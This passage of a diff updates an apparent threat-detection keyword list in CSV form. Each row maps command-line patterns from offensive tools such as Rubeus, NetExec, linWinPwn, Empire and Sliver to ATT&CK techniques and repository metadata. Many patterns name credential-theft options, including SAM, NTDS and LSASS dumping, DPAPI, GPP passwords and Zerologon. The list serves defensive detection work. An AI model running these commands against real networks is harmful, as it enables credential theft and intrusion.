Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* --single shadow.hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* silver * /domain*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /ldap *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /passlastset *","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* silver * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* --single shadow.hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* sip-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-call-spoof.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-log4shell.nse*","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","347","51","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* sip-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sitadel.py*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z" -"* -SiteListFilePath * -B64Pass *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* --skip-crawl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*- --skippasswordcheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - 
TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"* --skipregistryloggedon*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"* -SiteListFilePath * -B64Pass *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* --skip-crawl*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*- --skippasswordcheck*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"* --skipregistryloggedon*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "* skypev2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* sliver sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"* smb * --dpapi *password*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * --gen-relay-list *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * --lsa --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * -M lsassy*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -M masky -o CA=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -M msol *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * -M ntlmv1 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * -M rdp -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps 
automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -M runasppl*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -M zerologon*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * --ntds --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * --sam --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* smb * -u * 
-p * * -M dfscoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * * --rid-brute*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * * --shares --filter-shares *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * * -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * -M enum_av*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * -M enum_dns*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * -M gpp_password*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * -M met_inject *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* smb * -u * -p * --wmi ""select Name from win32_computersystem""*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* sliver sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - 
T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"* smb * --dpapi *password*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --gen-relay-list *.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --lsa --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M lsassy*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M masky -o CA=*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M msol *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M ntlmv1 *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -M rdp -o ACTION=enable*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M runasppl*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active 
Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -M zerologon*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * --ntds --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * --sam --log *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* smb * -u * -p * * -M dfscoerce*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * 
--rid-brute*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * --shares --filter-shares *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * * -X whoami --obfs*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M enum_av*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M enum_dns*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M gpp_password*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * -M met_inject *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* smb * -u * -p * --wmi ""select Name from win32_computersystem""*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 